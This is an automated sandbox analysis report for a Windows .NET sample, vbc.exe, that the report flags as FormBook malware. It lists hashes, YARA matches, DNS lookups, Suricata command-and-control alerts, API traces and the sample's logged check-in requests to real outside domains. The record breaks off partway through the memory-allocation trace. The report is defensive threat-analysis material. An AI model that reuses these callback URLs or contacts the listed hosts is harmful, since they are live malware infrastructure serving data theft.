popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

vbc.exe

Generic Malware UPX AntiDebug PE File OS Processor Check PE32 .NET EXE AntiVM
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 March 4, 2022, 9:38 a.m. March 4, 2022, 9:44 a.m.
Size 1.7MB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 4e5f33a27001659c1749482ab18fc78c
SHA256 65a142ad779f43ca45b3096c77817f62719432136038b288c85f158e6919d19c
CRC32 48C9048A
ssdeep 49152:lK4DeyprZqm8MmT/p4VGHXXiFzro4mW8wbIBuHukk:EFynJ8J4bk
PDB Path C:\projects\markdig\src\Markdig\obj\Release\net40\Markdig.pdb
Yara
  • PE_Header_Zero - PE File Signature
  • Generic_Malware_Zero - Generic Malware
  • OS_Processor_Check_Zero - OS Processor Check
  • IsPE32 - (no description)
  • Is_DotNET_EXE - (no description)
  • UPX_Zero - UPX packed file

Name Response Post-Analysis Lookup
www.absolutenuisance.com
A 198.54.117.218
A 198.54.117.216
A 198.54.117.217
CNAME parkingpage.namecheap.com
A 198.54.117.215
A 198.54.117.212
A 198.54.117.210
A 198.54.117.211
198.54.117.218
www.regitconference.com
CNAME regitconference.com
A 34.102.136.180
34.102.136.180
www.camaras.store
A 31.214.178.54
CNAME parkingsrv0.dondominio.com
31.214.178.54
www.global-forbes.biz
www.thebritenseries.com
A 109.68.33.25
109.68.33.25
www.townsvillelawnservice.com
A 23.192.44.203
A 23.192.44.211
CNAME a77.rackcdn.com.mdc.edgesuite.net
CNAME 3b0142cc29cf28098159-cdc64a38b4564caf0a2cd6fb65ed3c55.r77.cf1.rackcdn.com
CNAME a77.rackcdn.com
CNAME a79.dscg10.akamai.net
72.247.211.9
www.timothykmyers.store
A 172.67.186.67
A 104.21.72.146
104.21.72.146
www.glistonshop.com
www.ak8flfqzm8.com
www.tinawcounseling.com
www.paijuluntan.com
A 23.230.105.135
23.230.105.135
www.whatsappstatus17.com
A 162.43.112.107
162.43.112.107
www.xn--1lq90isray30ltdc.xn--czru2d
www.redenyl.com
A 13.250.192.238
CNAME dns.ladipage.com
CNAME ladi-dns-ssl-nlb-prod-4-5fac4e17b8b8295e.elb.ap-southeast-1.amazonaws.com
A 13.250.255.10
A 13.214.5.92
13.250.192.238
www.honeyroux.com
CNAME honeyroux-co.myshopify.com
A 23.227.38.74
CNAME shops.myshopify.com
23.227.38.74
IP Address Status Action
109.68.33.25 Active Moloch
13.250.192.238 Active Moloch
162.43.112.107 Active Moloch
164.124.101.2 Active Moloch
172.67.186.67 Active Moloch
198.54.117.218 Active Moloch
23.192.44.203 Active Moloch
23.227.38.74 Active Moloch
23.230.105.135 Active Moloch
31.214.178.54 Active Moloch
34.102.136.180 Active Moloch

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.101:57471 -> 164.124.101.2:53 2027863 ET INFO Observed DNS Query to .biz TLD Potentially Bad Traffic
TCP 192.168.56.101:49170 -> 31.214.178.54:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 31.214.178.54:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 31.214.178.54:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 172.67.186.67:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 172.67.186.67:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 172.67.186.67:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 23.227.38.74:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 23.227.38.74:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 23.227.38.74:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49167 -> 198.54.117.218:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49167 -> 198.54.117.218:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49167 -> 198.54.117.218:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49174 -> 23.192.44.203:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49174 -> 23.192.44.203:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49174 -> 23.192.44.203:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 162.43.112.107:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 162.43.112.107:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 162.43.112.107:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 23.230.105.135:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 23.230.105.135:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 23.230.105.135:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 13.250.192.238:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 13.250.192.238:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 13.250.192.238:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49166 -> 34.102.136.180:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49166 -> 34.102.136.180:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49166 -> 34.102.136.180:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49165 -> 109.68.33.25:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49165 -> 109.68.33.25:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49165 -> 109.68.33.25:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005b6090
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005b6090
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005b6090
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005b63d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005b6410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005b6410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
pdb_path C:\projects\markdig\src\Markdig\obj\Release\net40\Markdig.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x72fe1194
LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x72eb2ba1
mscorlib+0x320edb @ 0x72190edb
mscorlib+0x355fec @ 0x721c5fec
mscorlib+0x320dca @ 0x72190dca
mscorlib+0x32d54b @ 0x7219d54b
0x23186ab
0x2318d80
0x2317ca0
0x2317880
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72e32652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72e4264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72eb1838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72eb1737
mscorlib+0x2d3711 @ 0x72143711
mscorlib+0x308f2d @ 0x72178f2d
mscorlib+0x2cb060 @ 0x7213b060
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72e32652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72e4264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72eb1838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72eb1737
mscorlib+0x2d36ad @ 0x721436ad
mscorlib+0x308f2d @ 0x72178f2d
microsoft+0x50c17 @ 0x70090c17
microsoft+0x3f33f @ 0x7007f33f
microsoft+0x3edf8 @ 0x7007edf8
microsoft+0x3e3b9 @ 0x7007e3b9
microsoft+0x17e980 @ 0x701be980
0x6959ec6
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72e32652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72e4264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72e42e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72ef74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72ef7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72f81dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72f81e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72f81f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72f8416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7488f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74907f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74904de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.offset: 46887
exception.address: 0x760cb727
registers.esp: 2811496
registers.edi: 0
registers.eax: 2811496
registers.ebp: 2811576
registers.edx: 0
registers.ebx: 6316960
registers.esi: 5861056
registers.ecx: 160434084
1 0 0
suspicious_features GET method with no useragent header suspicious_request GET http://www.thebritenseries.com/dgrg/?Ezu=mCr2bk9utMed5cDMXVFdr9iozCQ1cWrktjHHNtCXCtaDPjQXv2li9qhUkXadvBgg4+vsUq2K&LL3H=Gbtltxj8p
suspicious_features GET method with no useragent header suspicious_request GET http://www.regitconference.com/dgrg/?Ezu=+jDLkUd/T225prqcYHH/4bFnKlSY/Za47FBItsElel80lJB79oXBde87fNSicjDwwnRfI9aQ&LL3H=Gbtltxj8p
suspicious_features GET method with no useragent header suspicious_request GET http://www.absolutenuisance.com/dgrg/?Ezu=01GUhnz4CiZPmAt3ZG8HJGtknkINMYvj6HWv01Tzu78UzROLgg7UaLcave3FmJKHWU9TgqXY&LL3H=Gbtltxj8p
suspicious_features GET method with no useragent header suspicious_request GET http://www.whatsappstatus17.com/dgrg/?Ezu=RIWw+B44pB/bs6HEV4KVi+k5e4us7AqCSBHbHQZByUXBW0C43SbbGQjqhG2nHh+UiLQmpWte&LL3H=Gbtltxj8p
suspicious_features GET method with no useragent header suspicious_request GET http://www.paijuluntan.com/dgrg/?Ezu=Ytr6b4NyyaACuwDDs0dfqrCNGhxp6wEv8VQAgTuVPpCBOA4gLR2kOHS5wPKhjqDks/cnVNxI&LL3H=Gbtltxj8p
suspicious_features GET method with no useragent header suspicious_request GET http://www.camaras.store/dgrg/?Ezu=wNFa0OxVuSrQXGQ4I/vM1XKMyEGzpo34n0hEDi1JOrG3rv708J9y4AImpUm6xJWVlLovEx0M&LL3H=Gbtltxj8p
suspicious_features GET method with no useragent header suspicious_request GET http://www.timothykmyers.store/dgrg/?Ezu=rffvGNpIh80pkd2KKwc9kqZB1eaV7z5n/tPDQTuI+pHmBd3q0mMkpIkBhWayC3GL117hcnn5&LL3H=Gbtltxj8p
suspicious_features GET method with no useragent header suspicious_request GET http://www.redenyl.com/dgrg/?Ezu=tNlEf6bpc4SGDhfY+7q6/4SG/6QvqElE5GVAfttw+3ngw1pJuB2j4pOadtC1b5Lzfr+XpzhR&LL3H=Gbtltxj8p
suspicious_features GET method with no useragent header suspicious_request GET http://www.honeyroux.com/dgrg/?Ezu=McA2z5OcNlI/MUBBsROK4ODs+1W3rvgf3hH4swzPNXydJJUg1fRAJmFCx/zZjqh747eWnlmt&LL3H=Gbtltxj8p
suspicious_features GET method with no useragent header suspicious_request GET http://www.townsvillelawnservice.com/dgrg/?Ezu=81pzn3ogCMRExC3nRzFsjughtEaPXaw9e4lvID+4gVkPgbTsmxIHaXVh0Xfv5eCIXO+d6vQ2&LL3H=Gbtltxj8p
request GET http://www.thebritenseries.com/dgrg/?Ezu=mCr2bk9utMed5cDMXVFdr9iozCQ1cWrktjHHNtCXCtaDPjQXv2li9qhUkXadvBgg4+vsUq2K&LL3H=Gbtltxj8p
request GET http://www.regitconference.com/dgrg/?Ezu=+jDLkUd/T225prqcYHH/4bFnKlSY/Za47FBItsElel80lJB79oXBde87fNSicjDwwnRfI9aQ&LL3H=Gbtltxj8p
request GET http://www.absolutenuisance.com/dgrg/?Ezu=01GUhnz4CiZPmAt3ZG8HJGtknkINMYvj6HWv01Tzu78UzROLgg7UaLcave3FmJKHWU9TgqXY&LL3H=Gbtltxj8p
request GET http://www.whatsappstatus17.com/dgrg/?Ezu=RIWw+B44pB/bs6HEV4KVi+k5e4us7AqCSBHbHQZByUXBW0C43SbbGQjqhG2nHh+UiLQmpWte&LL3H=Gbtltxj8p
request GET http://www.paijuluntan.com/dgrg/?Ezu=Ytr6b4NyyaACuwDDs0dfqrCNGhxp6wEv8VQAgTuVPpCBOA4gLR2kOHS5wPKhjqDks/cnVNxI&LL3H=Gbtltxj8p
request GET http://www.camaras.store/dgrg/?Ezu=wNFa0OxVuSrQXGQ4I/vM1XKMyEGzpo34n0hEDi1JOrG3rv708J9y4AImpUm6xJWVlLovEx0M&LL3H=Gbtltxj8p
request GET http://www.timothykmyers.store/dgrg/?Ezu=rffvGNpIh80pkd2KKwc9kqZB1eaV7z5n/tPDQTuI+pHmBd3q0mMkpIkBhWayC3GL117hcnn5&LL3H=Gbtltxj8p
request GET http://www.redenyl.com/dgrg/?Ezu=tNlEf6bpc4SGDhfY+7q6/4SG/6QvqElE5GVAfttw+3ngw1pJuB2j4pOadtC1b5Lzfr+XpzhR&LL3H=Gbtltxj8p
request GET http://www.honeyroux.com/dgrg/?Ezu=McA2z5OcNlI/MUBBsROK4ODs+1W3rvgf3hH4swzPNXydJJUg1fRAJmFCx/zZjqh747eWnlmt&LL3H=Gbtltxj8p
request GET http://www.townsvillelawnservice.com/dgrg/?Ezu=81pzn3ogCMRExC3nRzFsjughtEaPXaw9e4lvID+4gVkPgbTsmxIHaXVh0Xfv5eCIXO+d6vQ2&LL3H=Gbtltxj8p
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00320000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00330000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2780
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72e31000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2780
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72e32000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 917504
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00670000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00710000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0045c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00475000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0047b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00477000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06930000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 573440
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06931000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0046a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00467000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0045a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00466000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x069bd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2780
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000
process_handle: 0xffffffff
3221225496 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x069be000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x069bf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02310000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0232f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02320000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02311000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02312000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0045d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02321000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02313000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02314000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02315000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0045e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02316000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2780
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 6
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000
process_handle: 0xffffffff
3221225496 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02317000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02322000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02318000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02319000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0045f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0231a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0231c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
